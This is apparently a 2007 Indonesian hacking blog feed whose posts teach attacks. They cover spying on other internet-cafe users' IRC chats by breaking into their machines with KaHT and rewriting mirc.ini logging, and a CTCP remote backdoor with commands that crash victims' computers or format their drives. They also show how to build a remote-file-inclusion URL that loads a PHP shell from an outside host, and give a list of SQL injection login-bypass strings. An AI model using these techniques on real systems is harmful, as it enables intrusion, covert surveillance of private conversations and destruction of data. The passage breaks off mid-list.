anda mengaktifkannya maka pada saat keluar dari IRC maka pesan ini akan muncul di channel dan orang lain akan mengetahui dimana anda berada saat chatting.&lt;br /&gt;&lt;br /&gt;2. Ssetelah keluar / disconnect dari mIRC, jangan lupa masuk mIRC lagi, dan segera ganti nama, e-mail, nickname alternative juga user id karena jika anda lupa menggantinya maka orang yang menggunakan komputer setelah anda akan mengetahui nama, e-mail, nickname,. alternativ dan user id anda.&lt;br /&gt;&lt;br /&gt;3. Jangan lupa, jika anda sering copy paste, segera hilangkan memory copy paste anda dengan melakukan copy text lain untuk menghindari orang lain untuk mengetahui paste text anda.&lt;br /&gt;&lt;br /&gt;Semoga informasi diatas dapat membantu dan menambah pengetahuan anda.&lt;br /&gt;&lt;br /&gt;Penulis :&lt;br /&gt;Yogya Family Code&lt;br /&gt;&lt;br /&gt;*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)&lt;br /&gt;&lt;br /&gt;Tips tambahan di IRC II&lt;br /&gt;Tips agar kita tidak diremote atau dipermainkan di IRC&lt;br /&gt;&lt;br /&gt;Sudah biasa banyak sekali spam di IRC yang menganggu contohnya ini :&lt;br /&gt;&lt;br /&gt;WANNA BE OPERATOR #channel ?? copy/paste this-&gt; &lt; &lt;== Jangan copy paste di mIRC anda kalau ada hal beginian karena dapat merusak / menyerang komputer anda (Sering ada di channel-channel besar, webmaster dah cek )&lt;br /&gt;STOP SPAM copy/paste this-&gt; &lt;&lt;== Ini juga sama saja&lt;br /&gt;&lt;br /&gt;Cara menangani para cracker :&lt;br /&gt;&lt;br /&gt;1. Periksalah remote mIRC anda caranya Tahan Alt lalu tekan R.&lt;br /&gt;2. Biasanya mIRC-mIRC warnet dikosongkan remotenya tapi jika ada isinya lebuh baik delete remote yang sekiranya aneh (asing).&lt;br /&gt;3. Periksa timer anda, caranya (ketik /timer ) jika misal ada timer yang bekerja ketik //!timers off&lt;br /&gt;4. Menghilangkan decode :&lt;br /&gt;Ketik kode ini di mIRC :&lt;br /&gt;&lt;br /&gt;//!timers off | !ignore -r | !unload -rsn " $+ $chr(160) $+ . $+ $chr(160) $+ " | !remove " $+ $chr(160) $+ . $+ $chr(160) $+ " | !say $script($script(0))&lt;br /&gt;&lt;br /&gt;Penulis :&lt;br /&gt;Yogya Family Code&lt;br /&gt;&lt;br /&gt;Referensi&lt;br /&gt;rhega (OP #Yogyakarta)&lt;br /&gt;&lt;br /&gt;Triks di IRC :&lt;br /&gt;Cara agar bisa masuk ke dal.net dal.net dimana sebelumnya tidak bisa masuk karena trojan atau virus ?&lt;br /&gt;masuklah ke irc.server.telkom.net.id setelah itu baru baru membuka server dal.net, jika masih tidak bisa maka anda harus mencari program scan antivirus dan trojan, anda dapat mendownloadnya berdasar referensi DAL.NET pada saat pesan terahkir connect.&lt;br /&gt;&lt;br /&gt;Bagaimana cara melacak keberadaan teman chat kita ?&lt;br /&gt;Whois saja chatter tersebut lalu cocokkan ip addreasnya dengan daftar ip addreas warnet Yogya di samping kanan. Jika ip addreas anda tidak ada dalam daftar maka anda dapat menggunakan pelacakan lain seperti http://www.apnic.org, :)&lt;br /&gt;&lt;br /&gt;Bagaimana cara melacak boks warnet teman chat kita ?&lt;br /&gt;Whois saja chatter tersebut lalu lihat sebelah kiri dari sebelum tanda "@ip addreas", jika ada angka maka kemungkinan besar dia di room tersebut, jika tidak ada maka periksa ip addreasnya apakah warnet tersebut menerapkan berbeda ip addreas tiap boks, jika iya maka hitunglah logika ip addreas tersebut sehingga ahkirnya dapat menemukan tempat boks teman chat anda.&lt;br /&gt;&lt;br /&gt;Bagaimana kita ingin mencari teman chat di warnet sendiri (Hanya untuk channel yang memiliki BOT khusus !seen)?&lt;br /&gt;D di channel #yogyakarta cukup ketikkan !seen *!*@ip addreas warnet anda, bisa juga dengan !seen nickname, fasilitas ini biasanya disediakan channel-channel besar tapi tidak menutep channel kecilpun mempunyai fasilitas ini.&lt;br /&gt;&lt;br /&gt;Bagaimana kita ingin mencari teman chat di warnet sendiri ? (Dari perintah DAL.NET! Tidak perlu BOT channel)&lt;br /&gt;/who #nama channel *@ip addreas warnet (cara ini sangat efektif jika BOT channel benar-benar memproteksi para chatter sehingga sangat membatasi informasi yang akan diberikan kepada anda).&lt;br /&gt;&lt;br /&gt;Bagaimana kita ingin mencari nickname teman kita di channel #yogyakarta ?&lt;br /&gt;cukup mudah, ketikkan di channel #yogyakarta !seen nickname teman kita.&lt;br /&gt;&lt;br /&gt;Bagaimana cara kita memata-matai teman chat kita di satu warnet ? Masuklah di Network Neighboure lalu cari nomor room teman chat kita lalu masuklah di logs mirc teman kita biasanya di "c:\program files\mirc\logs".&lt;br /&gt;&lt;br /&gt;Bagaimana cara kita meyakinkan bahwa teman chat kita disuatu room memang benar adanya memakai nickname yang kita maksud ?&lt;br /&gt;Masuklah di Network Neighboure lalu cari nomor room teman chat kita lalu masuklah ke directory mirc teman kita biasanya di "c:\program files\mirc" lalu buka file mirc.ini. Jika anda mengalami masalah tiap komputer dipassword maka anda dapat memanfaatkan program Internet Maniac beserta PQwak, jika tiap komputer menggunakan Windows XP, tembus aja pakek KAHT yang bisa kamu download disini.&lt;br /&gt;&lt;br /&gt;Proteksi diri di IRC dapat dilakukan dengan PSY dan Proxy tapi yang umum dan tidak memakan biaya adalah menggunakan proxy, bagaimana caranya ?&lt;br /&gt;Carilah proxy di google, kemudian pastekan ke option mIRC yaitu pada "connect" lalu "firewall', firewall support diganti "server", protocol diganti "proxy" lalu tinggal anda isi hostname dan portnya sesuai dengan proxy yang anda dapatkan.&lt;br /&gt;&lt;br /&gt;Referensi untuk mendapatkan proxy :&lt;br /&gt;&lt;br /&gt;- http://www.proxyweb.net&lt;br /&gt;- http://proxy.lessel.us/cgi-bin/nph-proxy.cgi&lt;br /&gt;- http://www.multiproxy.org&lt;br /&gt;- http://www.publicproxyservers.com/index.html&lt;br /&gt;- http://www.hotscripts.com/Detailed/28480.html&lt;br /&gt;- http://www.inetprivacy.com/a4proxy/anonymous-grc.htm&lt;br /&gt;- http://www.sa6ry.com/surfanonymous/faq/hide-ip-address.html&lt;br /&gt;- http://www.steganos.com (proxy)&lt;br /&gt;- http://www.guardster.com (free proxy)&lt;br /&gt;- http://www.anonymizer.com/index.cgi (proxy)&lt;br /&gt;- http://www.orangatango.com/home/index.ie.html (proxy)&lt;br /&gt;- http://proxify.com&lt;br /&gt;- http://www.tehbox.com/proxy&lt;br /&gt;- http://www.proxy4free.com/index.html&lt;br /&gt;- http://www.stayinvisible.com/index.pl&lt;br /&gt;- http://free-proxies.com&lt;br /&gt;&lt;br /&gt;(Referensi Proxy dari Si Cebol, Indonewbies.tk)&lt;br /&gt;&lt;br /&gt;Menampilkan ip-ip addreas para chatter di channel?&lt;br /&gt;&lt;br /&gt;Pada Option lalu pilih IRC lalu aktifkan / centang pada Show Ip Addreasess&lt;br /&gt;&lt;br /&gt;Penulis :&lt;br /&gt;Yogya Family Code&lt;br /&gt;&lt;br /&gt;*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)&lt;br /&gt;&lt;br /&gt;Special triks di IRC :&lt;br /&gt;Melihat seluruh isi chattingan teman kita disatu warnet walaupun komputer client / server tidak dishare sama sekali ! Luar biasa !&lt;br /&gt;(Ilmu rahasia kreasi webmaster sendiri pada bulan November 2004)&lt;br /&gt;&lt;br /&gt;Syarat untuk melakukan teknik memata-matai orang chatting di satu jaringan LAN (Local Area network) adalah sebagai berikut :&lt;br /&gt;&lt;br /&gt;1. Menguasai MS-DOS dengan baik (Karena disini semua menggunakan DOS)&lt;br /&gt;2. Punya logika yang baik dan dapat mengetik cepat (Karena disini anda dikejar dengan waktu dan membutuhkan pemikiran yang cepat)&lt;br /&gt;&lt;br /&gt;Baiklah kita langsung saja, terapkan ilmu KaHT seperti ditutorial hacker lalu untuk masuk ke komputer sasaran, setelah anda masuk dikomputer tujuan, segera anda masuk ke MiRC komputer sasaran biasanya ada di c:\program files\mirc (ketik : "cd\progra~1\mirc") tapi ada juga yang di c:\mirc tapi sangat jarang, (ketik : "cd\mirc")&lt;br /&gt;&lt;br /&gt;A. Untuk komputer yang drive D-nya di share :&lt;br /&gt;&lt;br /&gt;Saat ini anda periksa apakah komputer sasaran drive d-nya dishare ? jika ya ikuti cara dibawah ini&lt;br /&gt;jadi kodenya seperti dibawah ini kalau mau lengkap seperti ini&lt;br /&gt;&lt;br /&gt;[dirs]&lt;br /&gt;logdir=d:\&lt;br /&gt;&lt;br /&gt;[options]&lt;br /&gt;n1=5,100,0,0,0,0,0,0,0,1,0,1,1,1,1,1,1,1,0,0,1,1,1,0,5,0,0,0,0,0,1,0,0&lt;br /&gt;&lt;br /&gt;setelah itu tekan ctrl + z untuk menyimpan, lalu tinggal anda masuk ke drive D komputer tersebut melalui LAN yang tentu saja sudah dishare, jadi cukup double klik aja files berekstensi log, lalu buka files itu pakek notepad untuk melihat terus isi chattingannya.&lt;br /&gt;&lt;br /&gt;Jadi kesimpulannya yang membuat penyimpanan file log di drive D karena perintah :&lt;br /&gt;&lt;br /&gt;[dirs]&lt;br /&gt;logdir=d:\&lt;br /&gt;&lt;br /&gt;Jika anda bingung dalam menghitungkan angkanya diatas, ini urutannya untuk mempermudah:&lt;br /&gt;1. 5=1x&lt;br /&gt;2. 100=1x&lt;br /&gt;3. 0=7x&lt;br /&gt;4. 1=1x&lt;br /&gt;5. 0=1x&lt;br /&gt;6. 1=7x&lt;br /&gt;7. 0=2x&lt;br /&gt;8. 1=3x&lt;br /&gt;9. 0=1x&lt;br /&gt;10. 5=1x&lt;br /&gt;11. 0=5x&lt;br /&gt;12. 1=1x&lt;br /&gt;13. 0=2x&lt;br /&gt;&lt;br /&gt;B. Untuk komputer sasaran tidak dishare :&lt;br /&gt;&lt;br /&gt;Setelah anda membaca cara A Lalu sekarang bagaimana jika drive d tidak dishare ? tidak masalah ! kita tetap bisa mengikuti isi chattingan dia, caranya seperti diawal tadi yaitu cari dahulu program mIRC komputer sasaran yang biasanya ada di c:\program files\mirc (ketik : "cd\progra~1\mirc") tapi ada juga yang di c:\mirc tapi sangat jarang, (ketik : "cd\mirc")&lt;br /&gt;&lt;br /&gt;Setelah kita masuk didirektory MiRC, ketik "del mirc ini" setelah itu ketik "copy con mirc.ini" lalu ketik kode rekam mirc.ini dibawah ini :&lt;br /&gt;&lt;br /&gt;[options]&lt;br /&gt;n1=5,100,0,0,0,0,0,0,0,1,0,1,1,1,1,1,1,1,0,0,1,1,1,0,5,0,0,0,0,0,1,0,0&lt;br /&gt;&lt;br /&gt;setelah itu tekan ctrl + z untuk menyimpan, lalu silahkan tengok di "c:\progra~1\mirc\logs" cara melihat cukup ketik "type nickname.log*&lt;br /&gt;* : Nickname diisi nick orang&lt;br /&gt;&lt;br /&gt;Luar biasa buka, ingat sebagai catatan, Agar teknik berjalan baik maka teknik ini dilakukan / diterapkan pada semua boks warnet sebelum chatter tersebut chatting diboks tersebut, atau kalau udah terlanjut dia chatting di boks tersebut maka diset rekam aja MiRCnya gpp, sapa tahu MiRCnya error lalu dia buka lagi, :)&lt;br /&gt;&lt;br /&gt;Dari tutorial ini maka dimanapun anda berada, semua isi chatting anda dapat dilihat orang walaupun anda tidak menyadarinya, "anda tidak melihat kami tapi kami melihat anda" :))&lt;br /&gt;&lt;br /&gt;Penulis :&lt;br /&gt;Yogya Family Code&lt;br /&gt;&lt;br /&gt;*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)&lt;br /&gt;&lt;br /&gt;Remote IRC (Mengontrol 100% segala chattingan user)&lt;br /&gt;&lt;br /&gt;ketikkan perintah "ctcp *:*:?:$1-" ke dalam remote mIRC sasaran lalu masukan juga di dalam variables "%master Nick_kamu".&lt;br /&gt;&lt;br /&gt;Perintah mengontrol komputer target :&lt;br /&gt;&lt;br /&gt;/ctcp &lt;Nick_Target&gt; run rundll user,#7 : Melakukan Shutdown komputer sasaran&lt;br /&gt;/ctcp &lt;Nick_Target&gt; run rundll user,#3 : Membuat Crash / Hang komputer sasaran&lt;br /&gt;/ctcp &lt;Nick_Target&gt; run rundll user,#4 : Mengacaukan tampilan yang ahkirnya komputer sasaran Crash /Hang&lt;br /&gt;/ctcp &lt;Nick_Target&gt; run format /y &lt;drive&gt; : Melakukan format pada komputer sasaran&lt;br /&gt;/ctcp &lt;Nick_Target&gt; run http://&lt;namasitus&gt;.com : Membuka situs sesuai keinginan kamu&lt;br /&gt;/ctcp &lt;Nick_target&gt; /nick &lt;nama nick&gt; : Mengganti nick mIRC sasaran&lt;br /&gt;(Perintah lainnya dapat dilihat di Peritah DAl.NET)&lt;br /&gt;&lt;br /&gt;Penulis :&lt;br /&gt;Yogya Family Code&lt;br /&gt;&lt;br /&gt;Referensi :&lt;br /&gt;1. Jasakom.com&lt;br /&gt;&lt;br /&gt;*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)&lt;br /&gt;&lt;br /&gt;Kedasyatan Hennes Script NW v0.61 IRC&lt;br /&gt;Hennes Script NW v0.61 IRC : Download hennes Script NW v0.61&lt;br /&gt;&lt;br /&gt;Percayakah anda bahwa dengan script ini anda bisa mendapatkan puluhan kenalan baru bahkan mungkin ratusan dengan hitungan menit ? Anda harus coba jika anda sering mencari teman lewat Via IRC, karena script ini benar-benar hebat dalam melakukan mengirim pesan ke chatter-chatter, dan selain itu juga juga bisa diandalkan untuk inviter dan advertising apa saja, wow! Lalu apa yang membuat kemampuan script ini begitu hebat ? dan bagaimana cara kerjanya ? apa kelemahannya ?&lt;br /&gt;&lt;br /&gt;Script ini mampu memberikan pesan ke seluruh chatter dalam 1 channel meskipun anda langsung di ban oleh AOP, SOP bahkan founder waktu anda mengirim pesan oleh chatter-chatter, tapi pesan anda ke chatter tersebut tidak akan hilang / atau berhenti, tapi pengiriman pesan terus berjalan, bayangkan, apa kurang hebat ? tapi script ini mempunyai kelemahan yaitu kemampuan ini tidak akan berjalan jika anda masuk ke channel besar kayak #jakarta, #bandung, #yogyakarta, #solo, #semarang dan sebagainya, mengapa ? karena bagaimana mungkin kita chatting dengan semua orang di channel dalam 1 - 2 detik. jelas langsung disconect, cocoknya script ini dijalankan di channel yang ga begitu rame kaya #manado, #purwokerto, #yogya (kalo pas sepi) dan sebagainya.&lt;br /&gt;&lt;br /&gt;Sebelum kita memulai saran webmaster masuklah di Option dahulu untuk mengganti themenya menjadi MIRC, tapi kalau anda tidak ingin itu juga bukan masalah untuk percobaan script ini.&lt;br /&gt;&lt;br /&gt;Bagaimana cara menjalankan fasilitas ini ?&lt;br /&gt;Pada saat anda sudah connect ke dal.net dan masuk channel maka segera klik kanan saja pada room channel, lalu pilih pilihan other dan klik pada pilihan Send private message to everyone, dan tulis aja pesannya, nanti para chatter jika menjawab maka anda akan terasa di ajak chat duluan, hehe :)&lt;br /&gt;&lt;br /&gt;Sebenarnya banyak program-program luar biasa lainnya yang musti di punyai oleh anda para member, hanya saja family code disini memberikan informasi langka yang programnya ga ada di rental CD manapun di pelosok tanah air, menurut surfey Family Code, program-program hacker dan pemecah password udah banyak sekali di rental-rental CD seperti Passware Kit, trojan, backdoor dan lain-lainnya dan tentu saja semuanya bisa anda mudah dapatkan dengan sedikit money, jika anda merasa malas ke rental maka anda dapat langsung ke google aja mencari programnya, banyak banget, www.jasakom.com adalah sumber ilmu yang dapat anda pelajari sendiri.&lt;br /&gt;&lt;br /&gt;Penulis :&lt;br /&gt;Yogya Family Code&lt;br /&gt;&lt;br /&gt;*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-431564688556248093?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/431564688556248093'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/431564688556248093'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/tips-dan-triks-irc-special.html' title='Tips dan triks IRC (Special)'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-5143238478203662450</id><published>2007-09-29T03:47:00.000+07:00</published><updated>2007-09-29T03:53:10.222+07:00</updated><title type='text'>Mengenal Shell inject dengan teknik Remote File Include Vulnerability</title><content type='html'>Mengenal shell exploite inject&lt;br /&gt;Mungkin anda masih merasa bingung dengan shell exploite inject pada web tapi pada dasarnya semua shell sama saja cuma yang membedakan cara pemakaian shell atau bentuk dari shell itu sendiri apa berbasis aplikasi atau berbasis website tapi namanya shell jelas command - command masih sama mungkin misalkan pada shell yang aplikasi servernya berbasis linux jelas perintah yang digunakan berbasis linux juga. nah kali ini saya akan membahas tentang shell inject yang jelas saja berbasis website karena pada umumnya orang - orang memakai shell ini dalam dunia IRC biasa disebut dengan kalimat “target” saya juga heran mengapa dinamakan target? mungkin karena sudah kebiasaan padahal namanya shell inject.&lt;br /&gt;&lt;br /&gt;Bagai mana cara mendapatkan shell tersebut?..&lt;br /&gt;Mudah saja hanya dengan meman faatkan bugs bugs pada script web tersebut biasanya itu semua kelalaian dari pemakai web yang mempunyai bugs nah dalam pencarian shell inject berbasis web ini ada bermacam cara - cara injected tapi saya akan membahas cara inject dengan Remote File Inclusion Vulnerability itu menggunakan bugs dalam file script pada website yang akan di inject&lt;br /&gt;&lt;br /&gt;Bagai mana cara melihat bugs pada suatu script aplikasi pada website?..&lt;br /&gt;Hanya dengan menggunakan rumus logika panggilan data (include,require) ditambah dengan variabel pada script tersebut inlclude + $variabel semua memakai rumus seperti itu contoh script&lt;br /&gt;&lt;br /&gt;&lt;?php require&lt;br /&gt;&lt;br /&gt;($docroot.'/FCDIRECTORY/fc_functions/fc_functions.php');&lt;br /&gt;&lt;br /&gt; ?&gt;&lt;br /&gt;&lt;br /&gt;require &lt;--- panggilan data&lt;br /&gt;&lt;br /&gt;$docroot &lt;--- variabel&lt;br /&gt;&lt;br /&gt;/FCDIRECTORY/fc_functions/fc_functions.php &lt;---&lt;br /&gt;&lt;br /&gt;directory dan file dimana ditemukan bugs&lt;br /&gt;(kerusakan atau kelemahan)&lt;br /&gt;&lt;br /&gt;jelas pada script di atas kelihatan bugs jika dikaitkan dengan rumus include+variabel maka akan menjadi suatu shell inject tinggal kita mengolah script tersebut.&lt;br /&gt;&lt;br /&gt;sekarang kita akan membentuk suatu script yang sebentar akan dikaitkan dengan link pada website degan cara memutar balikan script tersebut dengan mengubah kedudukan include dan variabel serta mengubah variabel yang dikenal tanda “$” menjadi “?”&lt;br /&gt;&lt;br /&gt;$docroot.'/FCDIRECTORY/fc_functions/fc_functions.php&lt;br /&gt;&lt;br /&gt;jika diputar balikan akan menjadi&lt;br /&gt;&lt;br /&gt;/FCDIRECTORY/fc_functions/fc_functions.php?docroot=&lt;br /&gt;&lt;br /&gt;Kaitan Bugs dan Link pada Website&lt;br /&gt;Ini merupakan saat yang paling enak dipelajari apa kaitan bugs dengan link pada website atau target website yang akan kita masuk. Jelas kaitanya sangat erat dan wajib untuk diperlakukan. Mengapa?..karena tanpa bugs tersebut kita tidak bisa mendapatkan shell inject kita akan masuk pada website melalui bugs atau kelemahan pada website tersebut dimana letak kelemahan website tersebut?..letaknya ada pada script bugs&lt;br /&gt;&lt;br /&gt;&lt;?php&lt;br /&gt;&lt;br /&gt;require&lt;br /&gt;&lt;br /&gt;($docroot.'/FCDIRECTORY/fc_functions/fc_functions.php');&lt;br /&gt;&lt;br /&gt; ?&gt;&lt;br /&gt;&lt;br /&gt;sekarang kita akan menggabungkan link website dengan bugs tapi sebelumnya kita harus mempunyai injection atau code shell php anda bisa dapatkan pada link www.andi-a.biz/tools/shell.txt? atau www.andi-a.biz/tools/r57.txt?&lt;br /&gt;nah sekarang akan kita gabungkan akan menjadi seperti&lt;br /&gt;&lt;br /&gt;/FCDIRECTORY/fc_functions/&lt;br /&gt;fc_functions.php?docroot=[shell code]&lt;br /&gt;&lt;br /&gt;contoh:&lt;br /&gt;&lt;br /&gt;www.site.com/[path]/FCDIRECTORY/fc_functions/&lt;br /&gt;fc_functions.php?docroot=[shell code]&lt;br /&gt;&lt;br /&gt;gunakan shell code :&lt;br /&gt;&lt;br /&gt;www.andi-a.biz/tools/shell.txt?&lt;br /&gt;&lt;br /&gt;contoh :&lt;br /&gt;&lt;br /&gt;fc_functions.php?docroot=www.andi-a.biz/tools/shell.txt?&lt;br /&gt;&lt;br /&gt;jika sudah menjadi seperti itu kita tinggal mencari target website yang siap kita masuk biasanya pencarian target website lewat situs pencarian seperti yahoo,google,altavista,lycos dan masih banyak lagi atau bisa menggunakan bot scan perl lewat IRC (yang menggunakan bot scan kerjaan orang malas) namun apa salahnya jika teknologi semakin berkembang menggapa tidak jika kita menggunakan sesuatu yang akan mempermudah pekerjaan kita&lt;br /&gt;&lt;br /&gt;Screenshot Shell Inject&lt;br /&gt;&lt;br /&gt;tampilan shell code&lt;br /&gt;&lt;br /&gt;shell1.gif&lt;br /&gt;&lt;br /&gt;tampilan list directory shell code&lt;br /&gt;&lt;br /&gt;shell2.gif&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-5143238478203662450?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/5143238478203662450'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/5143238478203662450'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/mengenal-shell-inject-dengan-teknik_29.html' title='Mengenal Shell inject dengan teknik Remote File Include Vulnerability'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-6182461271735012474</id><published>2007-09-29T03:36:00.000+07:00</published><updated>2007-09-29T03:38:08.133+07:00</updated><title type='text'>Konsep Dasar SQL Injection</title><content type='html'>SQL singkatan dari Structured Query Language yg merupakan bahasa komputer standar yg ditetapkan oleh ANSI (American National Standard Institute) untuk mengakses dan memanupulasi sistem database. SQL bekerja dgn program2 database seperti MS Access, DB 2, Informix, MS SQL Server, Oracle, Sybase dan lain sebagainya.&lt;br /&gt;&lt;br /&gt;SQL Injection attack merupakan salah satu teknik dalam melakukan web hacking utk menggapai akses pada sistem database yg berbasis SQL. Teknik ini memanfaatkan kelemahan dalam bahasa pemprograman scripting pada SQL dalam mengolah suatu sistem database. Hasil yg ditimbulkan dari teknik ini membawa masalah yg sangat serius. Mengapa disebut SQL Injection ? seperti yg kita ketahui, injection jika diartikan ke dalam bahasa Indonesia yaitu "suntikan". Yang terjadi memang seperti melakukan suntikan terhadap SQL yg tujuannya adalah tergantung kepada pelakunya dan pada intinya jika disalahgunakan maka akan membawa aspek negatif terhadap korban.&lt;br /&gt;&lt;br /&gt;Sudah disinggung diatas bahwa SQL Injection attack memanfaatkan kelemahan dalam bahasa pemprograman scripting pada SQL maksudnya adalah memanfaatkan teknik string building untuk mengeksekusi/menjalankan kode SQL. Jadi prinsip dasar SQL Injection sebenarnya memanfaatkan kode insecure (tidak aman) atas sebuah sistem yg terhubung ke internet dalam upaya melangkahi command (perintah) dan secara langsung menuju ke database untuk kemudian mengambil keuntungan dari sistem yg dijamin aman untuk melakukan pengambilan atau pengubahan atau lain sebagainya oleh penyerang.&lt;br /&gt;&lt;br /&gt;Keuntungan yg diambil adalah seperti login akses terhadap server yg bukan haknya atau yg lainnya, tergantung kepada penyerangnya.&lt;br /&gt;&lt;br /&gt;Input Query String&lt;br /&gt;&lt;br /&gt;Default setting dari SQL menggunakan :&lt;br /&gt;&lt;br /&gt;adminID = sa&lt;br /&gt;&lt;br /&gt;password ='' (kosong atau blank)&lt;br /&gt;&lt;br /&gt;misalnya : http://www.target.com/login.asp?adminID=sa%20password=''&lt;br /&gt;&lt;br /&gt;%20 artinya menggantikan "jarak spasi"&lt;br /&gt;&lt;br /&gt;Ini merupakan kondisi yg berbahaya jika pengubahan setting tidak segera dilakukan.&lt;br /&gt;&lt;br /&gt;Verifikasi yg dilakukan oleh SQL disaat pemakai memasukkan username dan password adalah seperti yg terlihat pada teks sebagai berikut :&lt;br /&gt;&lt;br /&gt;SQLQuery="SELECT Username FROM Users WHERE Username="'&amp;strUsername&amp;"'strpassword&amp;"'&lt;br /&gt;&lt;br /&gt;Pada verifikasi terdapat kelemahan pada pemprosesan pada string2 tertentu yg sebenarnya string tersebut dapat dikatakan sebagai input ilegal. Verifikasi tetap melakukan proses dan nantinya menghasilkan error page. Error page tersebut justru membuka rahasia struktur database dan bahkan error page tetapi eksekusi terhadap validasi input tetap dijalankan.&lt;br /&gt;&lt;br /&gt;Contoh : menggunakan injection string 'OR''= pada username maupun password baik dilakukan dgn metode URL input query string maupun Box input query string maka SQL query akan membacanya sebagai berikut :&lt;br /&gt;&lt;br /&gt;SELECT Username FROM Users WHERE Username=''OR''='' AND Password=''OR''=''&lt;br /&gt;&lt;br /&gt;Maka yg terjadi adalah SQL query akan menyatakan blank username dan blank password sebagai user yg sah (valid). SQL Injection yg berhasil dilakukan akan ditandai dgn munculnya error page dgn error yg dimunculkan dapat berupa ODBC error, internal server error, syntax error dan lain sebagainya.&lt;br /&gt;&lt;br /&gt;Ada banyak variasi dari injection string yg dapat digunakan untuk melakukan SQL Injection :&lt;br /&gt;&lt;br /&gt;'or 1=1--&lt;br /&gt;&lt;br /&gt;'or 0=0 --&lt;br /&gt;&lt;br /&gt;'or 'x'='x&lt;br /&gt;&lt;br /&gt;'or a=a-&lt;br /&gt;&lt;br /&gt;"or 0=0 --&lt;br /&gt;&lt;br /&gt;"or 0=0 #&lt;br /&gt;&lt;br /&gt;"or "x"="x&lt;br /&gt;&lt;br /&gt;")or("a"="a&lt;br /&gt;&lt;br /&gt;admin'--&lt;br /&gt;&lt;br /&gt;hi" or 1=1 --&lt;br /&gt;&lt;br /&gt;hi' or'a'='a&lt;br /&gt;&lt;br /&gt;hi")or("a"="a&lt;br /&gt;&lt;br /&gt;or 0=0 #&lt;br /&gt;&lt;br /&gt;'or a=a--&lt;br /&gt;&lt;br /&gt;'or 0=0 #&lt;br /&gt;&lt;br /&gt;'having 1=1--&lt;br /&gt;&lt;br /&gt;"or 1=1--&lt;br /&gt;&lt;br /&gt;"or "a"="a&lt;br /&gt;&lt;br /&gt;')or('a'='a&lt;br /&gt;&lt;br /&gt;')or('x'='x&lt;br /&gt;&lt;br /&gt;hi" or "a"="a&lt;br /&gt;&lt;br /&gt;hi' or 1=1 --&lt;br /&gt;&lt;br /&gt;hi')or('a'='a&lt;br /&gt;&lt;br /&gt;or 0=0 --&lt;br /&gt;&lt;br /&gt;or 1=1--&lt;br /&gt;&lt;br /&gt;Serangan dgn menggunakan SQL Injection dapat lebih bervariasi lagi dan itu tergantung kepada situasi dan tujuan dari serangan yg dilakukan oleh penyerang. Contoh :&lt;br /&gt;&lt;br /&gt;'UPDATE YEPCell_memberDB set Credits=100 wher UserID='yamakasi'&lt;br /&gt;&lt;br /&gt;SQl Injection yg dilakukan seseorg dapat dideteksi dgn menggunakan IDS (Intrusion Detection System). IDS bukan lagi tool yg terlalu asing terdengar ditelinga anda. Anda dapat mencarinya di www.google.com&lt;br /&gt;&lt;br /&gt;Sumber : http://www.jambihackerlink.tk/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; SQL Commands Yang Umum Digunakan&lt;br /&gt;&lt;br /&gt;Berikut adalah beberapa SQL Commands yang umum, disini saya tidak akan memandu anda bagaimana cara penggunaan dari Command tersebut...jadi jangan pernah bertanya kepada saya bagaimana command tersebut digunakan.......sikap bijaksana yang harus anda ambil adalah dengan bertanya kepada paman google....karena dengannya akan terkuak jawaban dari pertanyaan anda..........&lt;br /&gt;&lt;br /&gt;Berikut ini Commandnya:&lt;br /&gt;&lt;br /&gt;ABORT -- abort the current transaction&lt;br /&gt;ALTER DATABASE -- change a database&lt;br /&gt;ALTER GROUP -- add users to a group or remove users from a group&lt;br /&gt;ALTER TABLE -- change the definition of a table&lt;br /&gt;ALTER TRIGGER -- change the definition of a trigger&lt;br /&gt;ALTER USER -- change a database user account&lt;br /&gt;ANALYZE -- collect statistics about a database&lt;br /&gt;BEGIN -- start a transaction block&lt;br /&gt;CHECKPOINT -- force a transaction log checkpoint&lt;br /&gt;CLOSE -- close a cursor&lt;br /&gt;CLUSTER -- cluster a table according to an index&lt;br /&gt;COMMENT -- define or change the comment of an object&lt;br /&gt;COMMIT -- commit the current transaction&lt;br /&gt;COPY -- copy data between files and tables&lt;br /&gt;CREATE AGGREGATE -- define a new aggregate function&lt;br /&gt;CREATE CAST -- define a user-defined cast&lt;br /&gt;CREATE CONSTRAINT TRIGGER -- define a new constraint trigger&lt;br /&gt;CREATE CONVERSION -- define a user-defined conversion&lt;br /&gt;CREATE DATABASE -- create a new database&lt;br /&gt;CREATE DOMAIN -- define a new domain&lt;br /&gt;CREATE FUNCTION -- define a new function&lt;br /&gt;CREATE GROUP -- define a new user group&lt;br /&gt;CREATE 